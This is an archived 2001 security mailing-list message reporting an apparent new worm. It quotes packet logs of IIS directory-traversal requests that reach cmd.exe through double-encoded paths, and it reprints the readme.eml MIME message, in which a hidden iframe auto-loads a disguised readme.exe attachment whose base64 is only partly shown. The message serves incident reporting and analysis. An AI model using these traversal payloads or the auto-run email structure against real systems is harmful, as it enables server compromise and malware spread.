Hm, have just check my snort logs and see a code red scan, The ip was pointing to www.forlog.fr Results : crash ie5 and ie6 when automaticaly loading a popup named readme.eml Definitely a new worm ... -----Message d'origine----- De : Pedro Miller Rabinovitch [mailto:pedroat_private] Envoye : mardi 18 septembre 2001 17:14 A : forensicsat_private Cc : Cory McIntire; focus-msat_private; focus-idsat_private Objet : New worm? 'readme.eml' Hi, is this CodeBlue? Some new worm? Or just one I hadn't heard about? It uses double-encoding exploits, and propagates both by adding javascript to the main page and by probing other systems... Report: Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS: Date Time D Source IP Sport Dport P 01Sep18 11:20 T 200.192.226.40 3933 80 T 01Sep18 11:20 T 200.192.226.40 3767 80 T 01Sep18 11:20 T 200.192.226.40 3572 80 T SOURCE: 200.192.226.40 45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx E...ba@.w..=...(xxxx 0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00 ...P{....~.NP."8.z.. 47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET /_vti_bin/..%255 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 c../..%255c../..%255 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 c../winnt/system32/c 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 md.exe?/c+dir HTTP/1 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e .0..Host: www..Connn 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a ection: close.... 45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx E....c@.w..:...(xxxx 0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00 ...P{....O..P."8.... 47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET /_mem_bin/..%255 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 c../..%255c../..%255 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 c../winnt/system32/c 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 md.exe?/c+dir HTTP/1 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e .0..Host: www..Connn 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a ection: close.... 45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx E...9e@.w.?....(xxxx 0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00 .].P{."6.LZ.P."8.6.. 47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e GET /msadc/..%255c.. 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e /..%255c../..%255c/. 2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e .%c1%1c../..%c1%1c.. 2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 /..%c1%1c../winnt/sy 73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 stem32/cmd.exe?/c+di 72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 r HTTP/1.0..Host: ww 77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 w..Connnection: clos 65 0d 0a 0d 0a e.... --------------- When I connected to the originating server (femm.tdkomm.com.br), I saw the normal web page for the institution, plus a pop-up window for http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as follows: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7 AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA ... (worm code follows) I've inspected the executable code, and it reads like a worm. (doh) Has anyone seen this? Regards, Pedro. -- Pedro Miller Rabinovitch Technology Manager Cipher Technology 55-21-2579-3999 http://www.cipher.com.br ----------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:06:15 PDT